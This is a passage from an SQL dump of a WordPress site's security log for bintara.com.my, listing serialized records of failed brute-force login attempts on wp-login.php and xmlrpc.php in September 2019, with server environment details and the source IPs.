empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"39593\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIB824SfF9g@8lNlxxEOAAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801268.0458\";s:12:\"REQUEST_TIME\";s:10:\"1568801268\";}}','notice','2019-09-18 10:07:49','2019-09-18 10:07:48',17740456,19232296,'https://bintara.com.my/wp-login.php',1,0,'97.74.228.176'),(25016,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"39970\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIB9jYpjlmVadK6PeGYXgAAAMs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801270.8018\";s:12:\"REQUEST_TIME\";s:10:\"1568801270\";}}','notice','2019-09-18 10:07:52','2019-09-18 10:07:51',18258144,19555904,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.228.176'),(25017,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.229.162\";s:11:\"REMOTE_PORT\";s:5:\"42904\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYID1VlvzIDnRn6zOHX5MwAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801750.0967\";s:12:\"REQUEST_TIME\";s:10:\"1568801750\";}}','notice','2019-09-18 10:15:53','2019-09-18 10:15:51',17740712,19232792,'https://bintara.com.my/wp-login.php',1,0,'159.65.229.162'),(25018,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.229.162\";s:11:\"REMOTE_PORT\";s:5:\"43708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYID2jYpjlmVadK6PeGaKwAAANg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801755.1347\";s:12:\"REQUEST_TIME\";s:10:\"1568801755\";}}','notice','2019-09-18 10:15:57','2019-09-18 10:15:55',18257168,19555184,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.229.162'),(25019,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"42840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIEt0QGijxhVPhG1M0uvQAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801975.5771\";s:12:\"REQUEST_TIME\";s:10:\"1568801975\";}}','notice','2019-09-18 10:19:36','2019-09-18 10:19:35',17740176,19231816,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(25020,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"43300\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIEujYpjlmVadK6PeGbDAAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568801978.7941\";s:12:\"REQUEST_TIME\";s:10:\"1568801978\";}}','notice','2019-09-18 10:19:40','2019-09-18 10:19:39',18257232,19555184,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(25021,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"23.226.131.177\";s:11:\"REMOTE_PORT\";s:5:\"40664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIFXFlvzIDnRn6zOHX51AAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568802140.219\";s:12:\"REQUEST_TIME\";s:10:\"1568802140\";}}','notice','2019-09-18 10:22:21','2019-09-18 10:22:20',17741000,19232904,'https://bintara.com.my/wp-login.php',1,0,'23.226.131.177'),(25022,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"23.226.131.177\";s:11:\"REMOTE_PORT\";s:5:\"41714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIFYDYpjlmVadK6PeGbkwAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802144.7799\";s:12:\"REQUEST_TIME\";s:10:\"1568802144\";}}','notice','2019-09-18 10:22:26','2019-09-18 10:22:25',18257976,19556472,'https://bintara.com.my/xmlrpc.php',1,0,'23.226.131.177'),(25023,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"203.146.253.85\";s:11:\"REMOTE_PORT\";s:5:\"43222\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIG@jYpjlmVadK6PeGc8gAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802555.0359\";s:12:\"REQUEST_TIME\";s:10:\"1568802555\";}}','notice','2019-09-18 10:29:17','2019-09-18 10:29:15',17741304,19232624,'https://bintara.com.my/wp-login.php',1,0,'203.146.253.85'),(25024,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 